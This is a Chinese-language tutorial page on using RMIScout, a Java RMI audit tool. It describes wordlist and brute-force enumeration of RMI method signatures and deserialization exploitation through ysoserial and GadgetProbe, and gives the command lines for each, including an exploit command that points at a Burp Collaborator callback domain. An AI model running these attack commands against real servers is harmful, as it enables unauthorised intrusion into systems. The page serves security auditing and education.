這篇文章主要介紹“RMIScout怎么使用”,在日常操作中,相信很多人在RMIScout怎么使用問(wèn)題上存在疑惑,小編查閱了各式資料,整理出簡(jiǎn)單好用的操作方法,希望對(duì)大家解答”RMIScout怎么使用”的疑惑有所幫助!接下來(lái),請(qǐng)跟著小編一起來(lái)學(xué)習(xí)吧!
創(chuàng)新互聯(lián)建站,專注為中小企業(yè)提供官網(wǎng)建設(shè)、營(yíng)銷型網(wǎng)站制作、成都響應(yīng)式網(wǎng)站建設(shè)、展示型成都網(wǎng)站制作、成都網(wǎng)站建設(shè)等服務(wù),幫助中小企業(yè)通過(guò)網(wǎng)站體現(xiàn)價(jià)值、有效益。幫助企業(yè)快速建站、解決網(wǎng)站建設(shè)與網(wǎng)站營(yíng)銷推廣問(wèn)題。
RMIScout是一款針對(duì)Java RMI的安全審計(jì)工具,該工具可以使用字典和爆破策略來(lái)枚舉Java RMI功能,并利用其中潛在的RMI參數(shù)解集(Unmarshalling)漏洞。實(shí)際上,RMIScout能夠針對(duì)Java RMI接口執(zhí)行基于字典的暴力破解攻擊,并在不需要調(diào)用任何其他方法的情況下安全地猜測(cè)方法簽名。
在一臺(tái)存在錯(cuò)誤配置的服務(wù)器中,任何已知的RMI簽名都會(huì)使用non-primitive類型,比如說(shuō)java.lang.String,而在這種情況下,攻擊者將能夠可通過(guò)將對(duì)象轉(zhuǎn)換為序列化的Payload來(lái)利用此漏洞。這種錯(cuò)誤配置非常常見(jiàn),比如說(shuō),VMWare vSphere Data Protection + vRealize Operations Manager、Pivotal tc Server and Gemfire和Apache Karaf + Cassandra等等。
RMIScout整合ysoserial和GadgetProbe將可以針對(duì)錯(cuò)誤配置進(jìn)程范圍序列化篩選器(JEP 290)的服務(wù)執(zhí)行反序列化攻擊。

1、提供字典和基于文本的爆破策略,而不是對(duì)64位方法哈希進(jìn)行爆破;
2、在無(wú)需任何方法調(diào)用的情況下識(shí)別RMI方法;
3、提供了一種簡(jiǎn)單的方法來(lái)利用已知的不安全RMI參數(shù)解集漏洞,并與ysoserial或Payload實(shí)現(xiàn)
ysoserial.payloads.ObjectPayload集成;4、集成GadgetProbe來(lái)識(shí)別遠(yuǎn)程類,以幫助識(shí)別相關(guān)軟件并構(gòu)建gadget鏈;
如需開(kāi)始搜索,可參考工具自帶的
lists/prototypes.txt字典文件,該字典文件涵蓋了超過(guò)15000種RMI原型。
可在無(wú)需執(zhí)行RMI函數(shù)的情況下對(duì)RMI方法進(jìn)行識(shí)別,RMIScout使用了底層RMI網(wǎng)絡(luò)功能和動(dòng)態(tài)類生成方法來(lái)發(fā)送帶有故意不匹配類型的RMI調(diào)用,以觸發(fā)遠(yuǎn)程異常。所有參數(shù)都將替換為動(dòng)態(tài)生成的可序列化類,該類的名稱假定為255個(gè)字符,并且在遠(yuǎn)程類路徑中不存在。比如說(shuō):
void login(String user, String password)
login((String) new QQkzkn3..255 chars..(), (String) new QQkzkn3..255 chars..())
如果目標(biāo)類存在,那么將會(huì)觸發(fā)一個(gè)由ClassNotFoundException發(fā)出的遠(yuǎn)程java.rmi.UnmarshalException異常或參數(shù)解集錯(cuò)誤,整個(gè)過(guò)程無(wú)需調(diào)用底層方法。
完整技術(shù)手冊(cè):【點(diǎn)我獲取】
廣大研究人員可以使用下列命令將項(xiàng)目源碼克隆至本地:
git clone https://github.com/BishopFox/rmiscout.git
針對(duì)遠(yuǎn)程RMI服務(wù),使用函數(shù)原型字典執(zhí)行基于字典的爆破攻擊:
./rmiscout.sh wordlist -i lists/prototypes.txt <host> <port>
使用方法字典和其他選項(xiàng)執(zhí)行爆破攻擊:
./rmiscout.sh bruteforce -i lists/methods.txt -r void,boolean,long -p String,int -l 1,4 <host> <port>
根據(jù)特定的ysoserial Payload以及Payload參數(shù)來(lái)轉(zhuǎn)換對(duì)象派生類型:
./rmiscout.sh exploit -s 'void vulnSignature(java.lang.String a, int b)' -p ysoserial.payloads.URLDNS -c "http://examplesubdomain.burpcollaborator.net" -n registryName <host> <port>
使用GadgetProbe和已知簽名對(duì)遠(yuǎn)程類路徑執(zhí)行爆破:
./rmiscout.sh probe -s 'void vulnSignature(java.lang.String a, int b)' -i ../GadgetProbe/wordlists/maven_popular.list -d "examplesubdomain.burpcollaborator.net" -n registryName <host> <port>
使用包含的rmiscout.sh自動(dòng)化對(duì)項(xiàng)目代碼進(jìn)行構(gòu)建,其封裝了java -jar語(yǔ)句:
./rmiscout.sh wordlist -i lists/prototypes.txt <host> <port>
或者,你也可以手動(dòng)構(gòu)建項(xiàng)目源碼,即使用傳統(tǒng)的java -jar語(yǔ)句:
# Manually build JAR ./gradlew shadowJar java -jar build/libs/rmiscout-1.01-SNAPSHOT-all.jar wordlist -i lists/prototypes.txt <host> <port>
運(yùn)行RMI演示服務(wù)器,并使用demo/wordlist.txt字典文件:
cd demo ./start.sh
到此,關(guān)于“RMIScout怎么使用”的學(xué)習(xí)就結(jié)束了,希望能夠解決大家的疑惑。理論與實(shí)踐的搭配能更好的幫助大家學(xué)習(xí),快去試試吧!若想繼續(xù)學(xué)習(xí)更多相關(guān)知識(shí),請(qǐng)繼續(xù)關(guān)注創(chuàng)新互聯(lián)網(wǎng)站,小編會(huì)繼續(xù)努力為大家?guī)?lái)更多實(shí)用的文章!
標(biāo)題名稱:RMIScout怎么使用
鏈接分享:http://chinadenli.net/article48/pgpoep.html
成都網(wǎng)站建設(shè)公司_創(chuàng)新互聯(lián),為您提供網(wǎng)站內(nèi)鏈、品牌網(wǎng)站建設(shè)、微信小程序、定制開(kāi)發(fā)、移動(dòng)網(wǎng)站建設(shè)、電子商務(wù)
聲明:本網(wǎng)站發(fā)布的內(nèi)容(圖片、視頻和文字)以用戶投稿、用戶轉(zhuǎn)載內(nèi)容為主,如果涉及侵權(quán)請(qǐng)盡快告知,我們將會(huì)在第一時(shí)間刪除。文章觀點(diǎn)不代表本網(wǎng)站立場(chǎng),如需處理請(qǐng)聯(lián)系客服。電話:028-86922220;郵箱:631063699@qq.com。內(nèi)容未經(jīng)允許不得轉(zhuǎn)載,或轉(zhuǎn)載時(shí)需注明來(lái)源: 創(chuàng)新互聯(lián)